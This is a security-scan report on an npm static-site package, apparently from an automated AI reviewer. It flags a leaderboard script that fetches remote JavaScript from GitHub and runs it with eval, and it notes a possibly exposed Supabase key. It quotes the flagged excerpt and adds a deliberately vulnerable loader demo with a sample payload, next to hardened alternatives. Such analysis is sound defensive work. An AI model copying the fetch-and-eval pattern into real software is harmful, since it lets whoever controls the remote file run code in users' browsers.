
grapes-andrewdingus@1.0.27

GRAPES OS static site — CDN-ready via unpkg

AI Security Review

scanned 2d ago · by lpm-firewall-ai

The package contains a static-site leaderboard page that loads remote JavaScript from GitHub and executes it with eval. Whoever controls that remote repository therefore controls the code that runs in users' browsers whenever the leaderboard page is opened, and can change it after the package was published.

Static reason
  • High-risk behavior combination matched malicious policy
  • Source matched previously finalized malicious package; routed for review
  • Source fingerprint signature matched known malicious package; routed for review
Trigger
Runtime visit to leaderboard.html
Impact
Arbitrary browser-side code execution in the package page context; potential credential/session/localStorage access or redirection if the remote payload changes
Mechanism
remote JavaScript fetch followed by eval
Attack narrative
When a user opens leaderboard.html, the included assets/js/leaderboard.js fetches a remote scores.js file from raw.githubusercontent.com and passes the returned text directly to eval. Although named as leaderboard data, this is executable code controlled outside the npm tarball, allowing post-publish payload changes in browser context.
Rationale
Direct source inspection confirms a concrete remote-code execution surface via fetch plus eval, not just a scanner label. Lack of install hooks lowers npm install-time risk, but the CDN/static-site package intentionally exposes runtime arbitrary remote execution. Product guard normalized a non-low false-positive publish_block request to warn-only suspicious.
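The fetch-then-eval pattern described above, beside a loader that treats the remote file as data, as an added example (it is not code from grapes-andrewdingus or the grapes-os repository). The fetch function is injected so the example runs offline; the responses are constructed stand-ins for what raw.githubusercontent.com might serve, and SCORES_URL is the URL the scan flagged.

```javascript
// Added example, not the package's code: the flagged fetch+eval pattern next to
// a hardened loader. "fetcher" is injected so nothing touches the network.

const SCORES_URL =
  "https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js";

// 1. The flagged pattern, simplified and kept intentionally vulnerable. Whatever
//    the remote host serves runs in the page's origin, so editing scores.js
//    after publish is code execution in every visitor's browser.
async function loadScoresUnsafe(fetcher, url) {
  const response = await fetcher(url);
  const jsCode = await response.text();
  return eval(jsCode); // the page's own comment says it: never use eval
}

// 2. Hardened replacement: the response is parsed as JSON and checked against a
//    strict shape. Nothing from the network is ever evaluated as code.
const MAX_ENTRIES = 100;
const NAME_RE = /^[A-Za-z0-9 _.-]{1,32}$/; // names stay safe to render as text

function validateScores(text) {
  let data;
  try {
    data = JSON.parse(text);
  } catch (e) {
    throw new Error("scores: response is not valid JSON");
  }
  if (!Array.isArray(data) || data.length > MAX_ENTRIES) {
    throw new Error(`scores: expected an array of at most ${MAX_ENTRIES} entries`);
  }
  return data.map((entry, i) => {
    if (entry === null || typeof entry !== "object" || Array.isArray(entry)) {
      throw new Error(`scores[${i}]: expected an object`);
    }
    const { name, score } = entry;
    if (typeof name !== "string" || !NAME_RE.test(name)) {
      throw new Error(`scores[${i}].name: rejected`);
    }
    if (typeof score !== "number" || !Number.isFinite(score) || score < 0) {
      throw new Error(`scores[${i}].score: rejected`);
    }
    // Only the validated fields are returned; any extra keys are dropped.
    return { name, score: Math.floor(score) };
  });
}

async function loadScoresSafe(fetcher, url) {
  const response = await fetcher(url);
  if (!response.ok) throw new Error(`scores: HTTP ${response.status}`);
  return validateScores(await response.text());
}

// 3. Constructed responses standing in for raw.githubusercontent.com.
function fakeFetcher(body, ok = true) {
  return async (_url) => ({ ok, status: ok ? 200 : 500, text: async () => body });
}

const BENIGN_SCORES = JSON.stringify([
  { name: "alice", score: 120 },
  { name: "bob", score: 95.7 },
]);
// What a swapped scores.js could look like: a side effect, then plausible data.
const HOSTILE_PAYLOAD =
  'globalThis.pwned = "payload ran"; [{ name: "x", score: 1 }]';

async function demo() {
  await loadScoresUnsafe(fakeFetcher(HOSTILE_PAYLOAD), SCORES_URL);
  console.log("unsafe loader ran remote code:", globalThis.pwned); // "payload ran"

  console.log("safe loader, benign data:",
    await loadScoresSafe(fakeFetcher(BENIGN_SCORES), SCORES_URL));
  try {
    await loadScoresSafe(fakeFetcher(HOSTILE_PAYLOAD), SCORES_URL);
  } catch (e) {
    console.log("safe loader, hostile payload:", e.message); // "scores: response is not valid JSON"
  }
}

demo().catch(console.error);
```

The hardened loader still trusts GitHub for availability, but a changed file can at worst fail validation; it cannot run. If the data really must ship as a script, the remaining option is to pin it inside the tarball or load it through a script tag with Subresource Integrity, neither of which the flagged file does.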
Evidence
  • package.json
  • leaderboard.html
  • assets/js/leaderboard.js
  • assets/js/app_functions.js
Network endpoints (3)
  • raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • hqlgppguxhqeaonjzinv.supabase.co
  • cdn.jsdelivr.net/npm/@supabase/supabase-js@2

Decision evidence

public snapshot
AI called this Suspicious at 94.0% confidence as Malware with medium false-positive risk.
Evidence for block
  • assets/js/leaderboard.js fetches https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • assets/js/leaderboard.js immediately evals fetched response text in the browser
  • leaderboard.html includes assets/js/leaderboard.js as a deferred runtime script
  • package.json homepage points to unrelated https://unpkg.com/bypass-sam1@latest/
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle scripts
  • Main package surface is a static site with HTML/CSS/JS assets
  • assets/js/app_functions.js Supabase anon key is used for public app listing RPCs, not credential harvesting
  • No filesystem, child_process, persistence, or npm-time execution found
Behavioral surface
Source: Eval, Network
Supply chain: HighEntropyStrings, UrlStrings
Manifest: No manifest risk signals triggered.
scanned 9 file(s), 41.9 KB of source; the external endpoints the scan found are the three listed under Network endpoints above.

Source & flagged code

6 flagged
assets/js/app_functions.js
patternName = supabase_service_key · severity = critical · line = 3 · matchedText = "eyJhbGc...w8"
Critical
Critical Secret

Package contains a critical-looking secret pattern.

assets/js/app_functions.js, line 3
patternName = supabase_service_key · severity = critical · line = 3 · matchedText = "eyJhbGc...w8"
Critical
Secret Pattern

Supabase service role key (JWT) in assets/js/app_functions.js

assets/js/app_functions.js, line 3
assets/js/leaderboard.js
    // assets/js/leaderboard.js, lines 36-47 (flagged excerpt, shown as-is)
    async function getScores() {
      let response = await fetch(
        "https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js",
      );
      return await response.text(); // is promise for whatever reason
    }
    ...
      let js_code = await getScores();
      eval(js_code); // never use eval
    } catch (e) {
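The scanner labels the matched string a service_role key, while the evidence-against list above calls it the anon key; the page shows only a truncated match ("eyJhbGc...w8", which is just the base64 of a JWT header), so the role cannot be settled from what is here. Supabase API keys are JWTs whose payload carries a `role` claim, and decoding that claim is the check that settles it. The following is an added example, not code from grapes-andrewdingus: it reads the claims of a key without verifying the signature (that would need the project's JWT secret), and the two sample keys are constructed with a hypothetical project ref and a bogus signature, not the key the scanner matched.

```javascript
// Added example, not the package's code: classify a Supabase key by its JWT
// claims. Signature is NOT verified; only the payload is decoded and read.

function base64UrlDecode(segment) {
  const b64 = segment.replace(/-/g, "+").replace(/_/g, "/");
  const padded = b64 + "=".repeat((4 - (b64.length % 4)) % 4);
  // Node has Buffer, browsers have atob; both give the bytes as a binary string.
  const bin = typeof Buffer !== "undefined"
    ? Buffer.from(padded, "base64").toString("binary")
    : atob(padded);
  // Re-interpret the bytes as UTF-8 so non-ASCII claim values survive.
  return decodeURIComponent(
    Array.from(bin, (c) => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("")
  );
}

function base64UrlEncode(str) {
  const b64 = typeof Buffer !== "undefined"
    ? Buffer.from(str, "utf8").toString("base64")
    : btoa(String.fromCharCode(...new TextEncoder().encode(str)));
  return b64.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

// Supabase API keys are HS256 JWTs; the payload carries iss, ref, role, iat, exp.
function classifySupabaseKey(token) {
  const parts = token.split(".");
  if (parts.length !== 3) throw new Error("not a JWT: expected three dot-separated segments");
  let header, payload;
  try {
    header = JSON.parse(base64UrlDecode(parts[0]));
    payload = JSON.parse(base64UrlDecode(parts[1]));
  } catch (e) {
    throw new Error("not a JWT: header or payload is not base64url-encoded JSON");
  }
  const role = typeof payload.role === "string" ? payload.role : "unknown";
  const now = Math.floor(Date.now() / 1000);
  return {
    alg: header.alg,
    issuer: payload.iss,
    projectRef: payload.ref,
    role,
    // service_role bypasses Row Level Security; anon is the key meant to be public.
    isServiceRole: role === "service_role",
    expired: typeof payload.exp === "number" && payload.exp < now,
  };
}

// Constructed samples: hypothetical project ref, bogus signature.
function makeUnsignedJwt(payload) {
  const header = { alg: "HS256", typ: "JWT" };
  return `${base64UrlEncode(JSON.stringify(header))}.${base64UrlEncode(JSON.stringify(payload))}.bogus-signature`;
}
const SAMPLE_PROJECT_REF = "abcdefghijklmnopqrst";
const SAMPLE_ANON_KEY = makeUnsignedJwt({
  iss: "supabase", ref: SAMPLE_PROJECT_REF, role: "anon", iat: 1700000000, exp: 4102444800,
});
const SAMPLE_SERVICE_KEY = makeUnsignedJwt({
  iss: "supabase", ref: SAMPLE_PROJECT_REF, role: "service_role", iat: 1700000000, exp: 4102444800,
});

console.log(classifySupabaseKey(SAMPLE_ANON_KEY));    // role: "anon", isServiceRole: false
console.log(classifySupabaseKey(SAMPLE_SERVICE_KEY)); // role: "service_role", isServiceRole: true
```

Both sample keys start with "eyJhbGc", the same prefix the scanner printed, because every HS256 JWT does; the prefix says nothing about the role. An anon key shipped in a browser bundle is expected and is only as dangerous as the project's Row Level Security policies; a service_role key in the same place is a full-access credential and should be rotated.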
Critical
Remote Asset Decode Execute

Source fetches a remote asset that is presented as data (scores.js), takes the response body and dynamically executes it. In this file there is no decoding step: the response text returned by getScores() is passed straight to eval.

assets/js/leaderboard.js, line 36
    // assets/js/leaderboard.js, lines 45-47
      let js_code = await getScores();
      eval(js_code); // never use eval
    } catch (e) {
High
Eval

Package source references dynamic code evaluation.

assets/js/leaderboard.js, line 45
matchType = normalized_sha256
matchedPackage = grapes-andrewdingus@1.0.25
matchedPath = assets/js/leaderboard.js
matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.25
similarity = 1.000
summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

assets/js/leaderboard.js
matchType = malicious_source_fingerprint_signature
signature = 26a6083a366a497c
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = grapes-andrewdingus@1.0.25
matchedPath = assets/js/leaderboard.js
matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.25
similarity = 1.000
shingleOverlap = 5
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

assets/js/leaderboard.js

Findings

3 Critical · 3 High · 2 Medium · 2 Low
  • Critical · Critical Secret · assets/js/app_functions.js
  • Critical · Remote Asset Decode Execute · assets/js/leaderboard.js
  • Critical · Secret Pattern · assets/js/app_functions.js
  • High · Eval · assets/js/leaderboard.js
  • High · Known Malware Source Similarity · assets/js/leaderboard.js
  • High · Known Malware Source Fingerprint Signature · assets/js/leaderboard.js
  • Medium · Network
  • Medium · Structural Risk Force Deep Review
  • Low · High Entropy Strings
  • Low · Url Strings